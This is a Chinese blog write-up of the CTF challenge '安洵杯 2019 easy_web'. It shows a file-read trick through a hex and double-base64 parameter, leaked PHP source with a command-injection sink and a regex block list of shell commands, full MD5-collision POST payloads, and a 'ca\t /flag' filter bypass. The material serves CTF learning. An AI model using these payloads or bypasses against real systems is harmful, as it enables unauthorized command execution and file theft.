[安洵杯 2019]easy_web 1

最新推荐文章于 2024-02-02 23:35:54 发布
最新推荐文章于 2024-02-02 23:35:54 发布
阅读量785 收藏 1
点赞数 2
分类专栏: php CTF 文章标签: md5 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44477223/article/details/115484773
版权
CTF 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
php
7 篇文章 0 订阅
订阅专栏

运用的知识点

  • base64加解密
  • md5碰撞

内容

在这里插入图片描述

解题

页面里没有什么东西,源码也没有提示。但是我们在URL里发现了不一样的东西?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=img执行的东西被base64加密了,解密一下
得到:MzUzNTM1MmU3MDZlNjc=
还是一个base64的加密,再解密:
3535352e706e67
楞了一会发现是16进制,解密:
555.png

他这个参数进行了hex→base64→base64三次加密。
到这里我就卡住了,想不到思路。抓一个包看看,没有发现什么东西。看了一下大佬的思路才明白。

我们可以利用这个将index.php带入img参数,构建PL:index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
在这里插入图片描述

得到一个base64加密的东西,解密:

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

到这里就清楚了,重点在

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

一个MD5的强类型,需要是字符来碰撞。构造PL:a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
虽然很多命令都被过滤了,不能ls,但是dir没有过滤。查看一下
在这里插入图片描述
不在这,返回上一级看看
在这里插入图片描述
最后查看FLAG,可是我不会绕过这个cat,看了一下别人的文章.
可以构造ca\t%20/flag \t会被识别成tab
在这里插入图片描述
拿到FLAG

无独有偶o
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
easy_web_view:在移动和Web上轻松浏览Web视图!
02-04
easy_web_view 在Flutter网站和移动设备上轻松浏览Web! 支持HTML内容或单个元素 支持降价来源 支持转换为Flutter小部件 支持远程下载URL Markdown-> HTML HTML-> Markdown 支持更改URL 可选文字 如果您提供...
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
[安洵 2019]easy_web详解
weixin_61995249的博客
10-03 705
靶场:https://www.nssctf.cn/problem/732。
[安洵 2019]easy_web
pakho_C的博客
04-17 3979
web第43题 [安洵 2019]easy_web 打开靶场 发现有命令执行的可能 在cmd参数中做尝试: 尝试了很多命令,发现基本都被过滤了 转换思路: img参数可以根据值进行读取,那么cmd参数可能同样可行,尝试对img参数的值base64解密 解密两次后发现一串字符 经过观察应该是16进制,转字符得到555.png: 按照此规则构造index.php的加密,然后作为img参数的值,那么理论上可以引入index.php文件 将TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
BUUCTF WEB [安洵 2019]easy_web
Y1da的博客
05-02 804
BUUCTF WEB [安洵 2019]easy_web 题目链接 BUUCTF在线评测 题目源码 i-SOON_CTF_2019/Web/easy_web at master · D0g3-Lab/i-SOON_CTF_2019 解题思路 进入环境后F12查看网页源代码 <html> <head></head> <body> <img src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAKgAAA
[安洵 2019]easy_web1
最新发布
不会编程的崽的博客
02-02 632
ctf 安洵 easy_web
BUUCTF-[安洵 2019]easy_web1
Monica的博客
11-09 1515
题目 分析 页面啥也没有,日常查看源代码 蓝色的东西有一大串,前面写着data:image/gif;base64 知识点: Data URI scheme data:image/png;base64的使用_凉茶微凉-CSDN博客 data:image/png;base64 - 心存善念 - 博客园 目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入 其实“data:image/gif;base64,R0lGODlhJ……” 就是一张图片的DataURL,就是利用
【BUUCTF】[安洵 2019]easy_web
aoao331198的博客
04-30 1831
开幕破防属于是。。。 观察url http://dc66bac4-e3ff-492e-b89e-6ddf6f65ab2b.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= img后面的像是一个base64加密后的字符串,cmd参数没有,尝试输入什么每什么反应,那就对这个字符串下手 显然还要进行一次 一串数字,hex解码 是一个图片名,可以推断存在任意文件读取漏洞,我们将index.php进行hex->b.
buuctf_练[安洵 2019]easy_web
m0_66225311的博客
10-28 3928
`url`地址和源代码的信息捕捉;图片和`base64`之间转换;`base64`和十六进制编码的了解;代码审计,绕过正则匹配对关键字的过滤;MD5碰撞,`md5`参数强转类型的强等于绕过
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
[GYCTF2020]Blacklist 1
weixin_44477223的博客
03-28 2884
题目运用的知识点 堆叠注入 handler命令的运用 内容 解题 打开发现和强网的题目类似,使用'发现注入点 http://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1' 进行联合注入,发现屏蔽了关键字 我们尝试使用堆叠注入 http://b87d8e8a-6b1d-48e3-9aa9-e8c44adb77ab.node3.buuoj.cn/?inject=1'; show tables; # 查表:http://b
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1294
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
[ZJCTF 2019]NiZhuanSiWei 1
weixin_44477223的博客
03-25 1200
[ZJCTF 2019]NiZhuanSiWei 题目运用的知识点 php伪协议 题目 打开发现是代码审计题,分析代码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"];//三个赋值 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br&g
关于SSTI注入的一些理解
weixin_44477223的博客
04-13 832
什么是SST 原理 利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 用途 让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这就大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 SSTI是什么 SSTI类似与sql注入,但是与sql有所不同的是,SSTI利用的事故网站的模板引擎,主要是网站处理框架。 Python的jinja2 ma
[BSidesCF 2020]Had a bad day 1
weixin_44477223的博客
04-15 802
知识点 伪协议的嵌套 题目 解题 index页面没看出啥特别的,题目要我们点击选项 发现有参数可以尝试读取,多次尝试后发现需要去掉.php才能成功 category=php://filter/read=convert.base64-encode/resource=index 拿到源码,base64解码一下 <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compat
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个属性值,最后再将其序列化回字符串。 具体的操作步骤可以参考以下代码: ```php <?php class User { public $name; public $age; } // 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的对象,有两个属性;`s:4:"name";s:5:"Alice";` 表示 `name` 属性的值为 `Alice`,`s:3:"age";i:20;` 表示 `age` 属性的值为 `20`。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值